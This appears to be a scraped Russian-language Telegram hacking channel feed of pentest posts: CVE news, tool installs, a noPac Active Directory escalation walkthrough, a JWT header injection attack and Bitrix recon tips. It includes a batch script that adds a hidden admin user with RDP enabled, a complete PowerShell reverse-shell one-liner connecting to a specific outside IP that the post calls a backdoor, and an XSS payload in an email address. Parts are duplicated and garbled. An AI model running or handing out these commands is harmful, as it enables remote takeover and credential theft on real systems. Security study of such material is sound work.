Forwarded from Monkey Hacker
Сreate user via bat file extension
#RU
На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.
#EN
I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.
#RU
На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.
#EN
I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.
net user test password /add
net localgroup Administrators test /add
net localgroup “Remote Desktop Users” test /add
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
Monkey Hacker
Сreate user via bat file extension #RU На данный момент изучаю Windows и его приколы. Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP. #EN I am currently learning Windows and its tricks. Here is a noscript to create…
Подписывайте на этого крутого парня, который днём и ночью, 25/8 изучает Bitrix ради интереса
CVE-2023-23415 ICMP RCE
Злоумышленник может удаленно использовать эту уязвимость с помощью ошибки протокола низкого уровня, содержащей фрагментированный IP-пакет в заголовке, который отправляется на целевую машину", - говорится в сообщении Microsoft.
Уязвимость затрагивает следующие продукты Microsoft:
Windows Server 2008@(-∞, Mar 14, 2023)
Windows Server 2012@(-∞, Mar 14, 2023)
Windows Server 2016@(-∞, Mar 14, 2023)
Windows 10@(-∞, Mar 14, 2023)
Windows 11@(-∞, Mar 14, 2023)
Windows Server 2022@(-∞, Mar 14, 2023)
Windows Server 2019@(-∞, Mar 14, 2023)
POC'a пока нет(
#CVE
Злоумышленник может удаленно использовать эту уязвимость с помощью ошибки протокола низкого уровня, содержащей фрагментированный IP-пакет в заголовке, который отправляется на целевую машину", - говорится в сообщении Microsoft.
Уязвимость затрагивает следующие продукты Microsoft:
Windows Server 2008@(-∞, Mar 14, 2023)
Windows Server 2012@(-∞, Mar 14, 2023)
Windows Server 2016@(-∞, Mar 14, 2023)
Windows 10@(-∞, Mar 14, 2023)
Windows 11@(-∞, Mar 14, 2023)
Windows Server 2022@(-∞, Mar 14, 2023)
Windows Server 2019@(-∞, Mar 14, 2023)
POC'a пока нет(
#CVE
Forwarded from Monkey Hacker
Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)
Такой способ повышения уже существует почти два года, однако этот способ актуален и интересный. А какие компоненты оно затрагивает?
1. По стандарту в настройках, обычный пользователь домена может присоединить компьютер к AD только 10 раз.
Чтобы это проверить, можно выполнить следующую команду:
Чтобы отличать учетные записи пользователей от учетных записей компьютеров, они должны иметь в атрибуте
2.
Объединяя эти вулны, мы имеем примерно такой сценарий
Пользователь запрашивает
Сценарий эксплуатации выглядит так:
1. В домен добавляется новая учетная запись компьютера.
2. Созданная учетная запись компьютера переименовывается в соответствии с именем существующего контроллера домена
3. Запрашивается
4. Созданное имя учетной записи компьютера снова переименовывается в исходное значение.
5. Сервисный билет Kerberos запрашивается с использованием расширения
Звучит душно, благо есть noPac, который эксплуатирует данную проблему
THX:
Такой способ повышения уже существует почти два года, однако этот способ актуален и интересный. А какие компоненты оно затрагивает?
1. По стандарту в настройках, обычный пользователь домена может присоединить компьютер к AD только 10 раз.
Чтобы это проверить, можно выполнить следующую команду:
Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuotaЧтобы отличать учетные записи пользователей от учетных записей компьютеров, они должны иметь в атрибуте
sAMAccountName на конце $. Однако прикол в том, что этот символ не всегда проверяется. Атрибутом имени учетной записи компьютера является sAMAccountName. Этот атрибут можно увидеть и отредактировать вручную с помощью ADSIEdit Tool2.
При запросе билета на обслуживание сначала необходимо предъявить TGT. Если запрашиваемый билет не найден KDC, KDC автоматически выполняет повторный поиск с последующим $. Если TGT получен для username, а пользователь username удален, то используя этот TGT для запроса сервисного билета для другого пользователя через S4U2self приведет к тому, что KDC будет искать username$ в AD. Объединяя эти вулны, мы имеем примерно такой сценарий
Пользователь запрашивает
TGT. Затем пользователь может попытаться удалить или переименовать исходную учетную запись компьютера. Получив TGT, пользователь может начать эксплуатировать sAMAccountName. А полностью зная, что KDC поставляет тикеты и временные сеансовые ключи пользователям и компьютерам в домене, мы это можем использовать для повышения привилегийСценарий эксплуатации выглядит так:
1. В домен добавляется новая учетная запись компьютера.
2. Созданная учетная запись компьютера переименовывается в соответствии с именем существующего контроллера домена
3. Запрашивается
Kerberos TGT с использованием обновленного имени учетной записи компьютера.4. Созданное имя учетной записи компьютера снова переименовывается в исходное значение.
5. Сервисный билет Kerberos запрашивается с использованием расширения
S4U2selfЗвучит душно, благо есть noPac, который эксплуатирует данную проблему
THX:
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.htmlhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.tomlhttps://github.com/WazeHell/sam-the-adminGitHub
GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user - GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domai...
❤4
This media is not supported in your browser
VIEW IN TELEGRAM
Adobe Acrobat Reader CVE-2023-21608 RCE: разбор уязвимости
В этой статье мы рассмотрим, как использовалась уязвимость
#CVE #RCE #моястатья
В этой статье мы рассмотрим, как использовалась уязвимость
use-after-free в Adobe Acrobat Reader DC. Ошибка была обнаружена в ходе проекта по фаззингу, направленной на популярные программы для чтения PDF. В итоге была успешно использована уязвимость для удаленного выполнения кода в Adobe Acrobat Reader.#CVE #RCE #моястатья
🌚4🔥2
Похек
Adobe Acrobat Reader CVE-2023-21608 RCE: разбор уязвимости В этой статье мы рассмотрим, как использовалась уязвимость use-after-free в Adobe Acrobat Reader DC. Ошибка была обнаружена в ходе проекта по фаззингу, направленной на популярные программы для чтения…
Большое спасибо за столь активное распространение поста!
Люблю всех вас 🛡️
Люблю всех вас 🛡️
🐳4
Forwarded from Proxy Bar
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!
usage:
Тупо бэкдор!
usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"🔥1
Foxit PDF Reader CVE-2022-28672 RCE: разбор уязвимости
В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость
#CVE #RCE #моястатья
В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость
use-after-free и несколько других багов в Foxit PDF Reader во время фаззинга. Мы смогли успешно использовать эту уязвимость для удаленного выполнения кода в Foxit PDF Reader.#CVE #RCE #моястатья
❤4
Exegol
Exegol - это хакерская среда, управляемая сообществом, мощная и в то же время достаточно простая, чтобы каждый мог использовать ее в повседневной работе. Exegol - это лучшее решение для развертывания мощных хакерских сред безопасно, легко и профессионально. Exegol подходит пентестерам, CTF-игрокам, bug bounty ресерчерам, начинающим и опытным пользователям, защитникам, от стильных пользователей macOS и корпоративных профессионалов Windows до опытных пользователей UNIX.
Установка:
Exegol - это хакерская среда, управляемая сообществом, мощная и в то же время достаточно простая, чтобы каждый мог использовать ее в повседневной работе. Exegol - это лучшее решение для развертывания мощных хакерских сред безопасно, легко и профессионально. Exegol подходит пентестерам, CTF-игрокам, bug bounty ресерчерам, начинающим и опытным пользователям, защитникам, от стильных пользователей macOS и корпоративных профессионалов Windows до опытных пользователей UNIX.
Установка:
git clone https://github.com/ThePorgs/Exegol.git
#tools🐳3
Forwarded from APT
Veeam Backup and Replication (CVE-2023-27532)
Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.
Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532
Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532
#veeam #credentials #rce #cve
Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.
Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532
Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532
#veeam #credentials #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡11🎉3
Команда CTF- RedHazzarTeam приглашает в свой состав начинающих специалистов или имеющих опыт в решении задач по криптографии , пывну и реверсу! Молодая амбициозная команда, в настоящий момент взодим в топ10 рейтинга ctftime по РФ. Приветствуются активное участие в жизни Команда CTF- RedHazzarTeam приглашает в свой состав начинающих специалистов или имеющих опыт в решении задач по криптографии , пывну и реверсу! Молодая амбициозная команда, в настоящий момент входим в топ10 рейтинга ctftime по РФ. Приветствуются активное участие в жизни команды, бешеное желание изучать разные аспекты ИБ. Если вас заинтересовало предложение, пишите в лс (@Hazzarim139)
🤝3
Уязвимость в протоколе Wi-Fi IEEE 802.11 позволяет перехватывать сетевой трафик
Ученые из Северо-Восточного университета и Левенского католического университета обнаружили фундаментальный недостаток в структуре стандарта IEEE 802.11, который позволяет вынудить точки доступа передавать сетевые кадры в формате простого текста. Эксперты предупредили, что уязвимость можно использовать для захвата TCP-соединений и перехвата клиентского трафика.
#xakep
Ученые из Северо-Восточного университета и Левенского католического университета обнаружили фундаментальный недостаток в структуре стандарта IEEE 802.11, который позволяет вынудить точки доступа передавать сетевые кадры в формате простого текста. Эксперты предупредили, что уязвимость можно использовать для захвата TCP-соединений и перехвата клиентского трафика.
#xakep
❤3
DalFox
Это мощный инструмент с открытым исходным кодом, ориентированный на автоматизацию, что делает его идеальным для быстрого сканирования на наличие XSS и анализа параметров. Его усовершенствованный механизм тестирования параметров призван упростить процесс обнаружения и проверки уязвимостей.
Установка:
Это мощный инструмент с открытым исходным кодом, ориентированный на автоматизацию, что делает его идеальным для быстрого сканирования на наличие XSS и анализа параметров. Его усовершенствованный механизм тестирования параметров призван упростить процесс обнаружения и проверки уязвимостей.
Установка:
go install github.com/hahwul/dalfox/v2@latestOR
brew tap hahwul/dalfox
brew install dalfox
docker pull hahwul/dalfox:latest
docker run -it hahwul/dalfox:latest /app/dalfox url https://www.hahwul.com
docker run -it hahwul/dalfox:latest /bin/bash
./dalfoxForwarded from Monkey Hacker
JWT header parameter injections
Согласно спецификации
Как вы видите, эти контролируемые пользователем параметры указывают серверу-получателю, какой ключ использовать при проверке подписи.
Спецификация
Вы можете использовать это поведение, подписав модифицированный
Хотя вы можете вручную добавить или изменить параметр
Сгенерируйте новый ключ RSA.
Отправьте запрос, содержащий
Измените пэйлоад токена по своему усмотрению.
Выберите
Отправьте запрос, чтобы проверить, как ответит сервер.
Вы также можете выполнить эту атаку вручную, добавив заголовок
Согласно спецификации
JWS, обязательным является только параметр alg. Однако на практике заголовки JWT часто содержат несколько других параметров. Следующие из них представляют особый интерес для нас.jwk (JSON Web Key) - Предоставляет встроенный объект JSON, представляющий ключ.jku (JSON Web Key Set URL) - Предоставляет URL, по которому серверы могут получить набор ключей, содержащих правильный ключ.kid (Key ID) - предоставляет идентификатор, который серверы могут использовать для определения правильного ключа в случаях, когда есть несколько ключей на выбор. В зависимости от формата ключа, он может иметь соответствующий параметр kid.Как вы видите, эти контролируемые пользователем параметры указывают серверу-получателю, какой ключ использовать при проверке подписи.
Спецификация
JSON Web Signature (JWS) описывает дополнительный параметр заголовка jwk, который серверы могут использовать для встраивания своего открытого ключа непосредственно в сам токен в формате JWK.{
{
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
"typ": "JWT",
"alg": "RS256",
"jwk": {
"kty": "RSA",
"e": "AQAB",
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
"n": "yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m"
}
}
В идеале серверы должны использовать только ограниченный белый список открытых ключей для проверки подписей JWT. Однако неправильно настроенные серверы иногда используют любой ключ, встроенный в параметр jwk.Вы можете использовать это поведение, подписав модифицированный
JWT с помощью собственного закрытого ключа RSA, а затем вставив соответствующий открытый ключ в заголовок jwk.Хотя вы можете вручную добавить или изменить параметр
jwk в Burp, расширение JWT Editor предоставляет полезную функцию, которая поможет вам проверить эту уязвимость:Сгенерируйте новый ключ RSA.
Отправьте запрос, содержащий
JWT, в Burp Repeater.Измените пэйлоад токена по своему усмотрению.
Выберите
Embedded JWK. Когда появится запрос, выберите только что сгенерированный RSA-ключ.Отправьте запрос, чтобы проверить, как ответит сервер.
Вы также можете выполнить эту атаку вручную, добавив заголовок
jwk самостоятельно. Однако вам также может понадобиться обновить параметр kid заголовка JWT, чтобы он соответствовал kid встроенного ключа. Встроенная атака расширения сделает этот шаг за вас.GitHub
GitHub - blackberry/jwt-editor: A Burp Suite extension and standalone application for creating and editing JSON Web Tokens. This…
A Burp Suite extension and standalone application for creating and editing JSON Web Tokens. This tool supports signing and verification of JWS, encryption and decryption of JWE and automation of se...
This media is not supported in your browser
VIEW IN TELEGRAM
🦀skanuvaty🦀
Современный оптимизированный фаззер на Rust для поиска субдоменов и ip адресов.
Для начала вам нужно будет установить Rust:
Современный оптимизированный фаззер на Rust для поиска субдоменов и ip адресов.
Для начала вам нужно будет установить Rust:
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
Далее вам нужно будет скачать репозиторий и сбилдить инструмент:git clone https://github.com/Esc4iCEscEsc/skanuvaty; cd skanuvaty; cargo build --releaseДалее советую вам переместить его в папку к остиальным приложениям
sudo mv target/release/skanuvaty /bin/БОНУС
skanuvaty-parse- bash скрипт для упрощения парсинга output файла)
#!/bin/bash
cat $1 | jq -r ".subdomains[].name" | sort
Далее выдаёте права на запуск и перемещаете к фаззеруsudo chmod +x skanuvaty-parse; sudo mv skanuvaty-parse /bin/
Использование:skanuvaty--target google.com --concurrency 16 --subdomains-file /usr/share/dnsrecon/subdomains-top1mil-20000.txtГотово!
skanuvaty-parse skanuvaty.output.json
🔥7
Forwarded from Что-то на пентестерском
Атаки на 1с-битрикс | Часть 1 | Разведка 🤓
Что делать есть по всем известной методичке ненадох в плане уязвимостей?
Как-то раз я выступал тему как ломать 1с-битрикс сайты у друзей @RESOLUTEATTACK на youtube канале Доклад
И обсудил некоторые моменты, давайте преображу их в текст и вкратце обсудим что делать
⛈ Самописные php скрипты
Допустим вы развернули сайт на битриксе и ходите сделать что-то типа информационного сайта
По дефолту у битрика есть шаблоны, но их приходится переписывать и писать что-то своё
Таким образом и появляются самописные php скрипты с использованием api bitrix и возможно с небезопасно написанным кодом
⛈ Где такое найти?
🟢 AJAX - чаще используют концепцию SPA(Single page application) когда с основной страницы по одному клику может выскочить к примеру форма подписки на рассылку
В таком случае достаточно порыться в коде элемента и собрать ряд js скриптов и собрать информацию с основной страницы, искать можно по словам типа: ajax, $.get, $.post, XMLHttpRequest
И заметить что в js скрипте есть php файл к которому идет ajax, также можно заметить какие query string параметры ему передаются и через какой http метод
🟢 Фаззинг - достаточно запустить какой нибудь ffuf, wfuzz, dirsearch с расширением файла php и найти самописный скрипт
🟢 JS файлы - покопавшись в коде панели разработчика или отрыв js скрипт с фаззинга можно открыть их в браузере и поискать на слова типа: .php, .inc, .inc.php
ЧТНП | #исследования #web
Что делать есть по всем известной методичке ненадох в плане уязвимостей?
Как-то раз я выступал тему как ломать 1с-битрикс сайты у друзей @RESOLUTEATTACK на youtube канале Доклад
И обсудил некоторые моменты, давайте преображу их в текст и вкратце обсудим что делать
Допустим вы развернули сайт на битриксе и ходите сделать что-то типа информационного сайта
По дефолту у битрика есть шаблоны, но их приходится переписывать и писать что-то своё
Таким образом и появляются самописные php скрипты с использованием api bitrix и возможно с небезопасно написанным кодом
В таком случае достаточно порыться в коде элемента и собрать ряд js скриптов и собрать информацию с основной страницы, искать можно по словам типа: ajax, $.get, $.post, XMLHttpRequest
И заметить что в js скрипте есть php файл к которому идет ajax, также можно заметить какие query string параметры ему передаются и через какой http метод
ЧТНП | #исследования #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Что-то на пентестерском
Атаки на 1с-битрикс | Часть 2 | Атака🤓
⛈ Атака на самописы
Когда вы обнаружили список самописных скриптов и определились какие query string параметры они принимают, можно протестировать на ряд уязвимостей в зависимости от функционала скрипта
К примеру, если это подписка на рассылку, значит он будет ожидать email адрес, оттуда и можно построить вектор атаки и потестировать к примеру на XSS таким пэйлоадом:
🟢 Атака Mass Assignment
Программные фреймворки или скрипты иногда позволяют разработчикам автоматически привязывать параметры HTTP-запроса к переменным кода программы или объектам, чтобы упростить использование этого фреймворка или скрипта. Иногда это может причинить вред
Мы можем использовать эту методологию для добавления новых параметров, которые разработчик не предполагал, что, в свою очередь, создает или перезаписывает объекты в программном коде
Это называется Mass Assignment
Таким образом мы можем поискать скрытые параметры и потестить их на любые уязвимости
Список утилит для поиска скрытых параметров:
➡️ X8
➡️ ParamSpider
➡️ Arjun
➡️ ParamMiner
ЧТНП | #web #исследования
Когда вы обнаружили список самописных скриптов и определились какие query string параметры они принимают, можно протестировать на ряд уязвимостей в зависимости от функционала скрипта
К примеру, если это подписка на рассылку, значит он будет ожидать email адрес, оттуда и можно построить вектор атаки и потестировать к примеру на XSS таким пэйлоадом:
mail(<noscript>alert(0)</noscript>)@gmail.com
Полный список трюков по email можно глянуть тут Программные фреймворки или скрипты иногда позволяют разработчикам автоматически привязывать параметры HTTP-запроса к переменным кода программы или объектам, чтобы упростить использование этого фреймворка или скрипта. Иногда это может причинить вред
Мы можем использовать эту методологию для добавления новых параметров, которые разработчик не предполагал, что, в свою очередь, создает или перезаписывает объекты в программном коде
Это называется Mass Assignment
Таким образом мы можем поискать скрытые параметры и потестить их на любые уязвимости
Список утилит для поиска скрытых параметров:
ЧТНП | #web #исследования
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2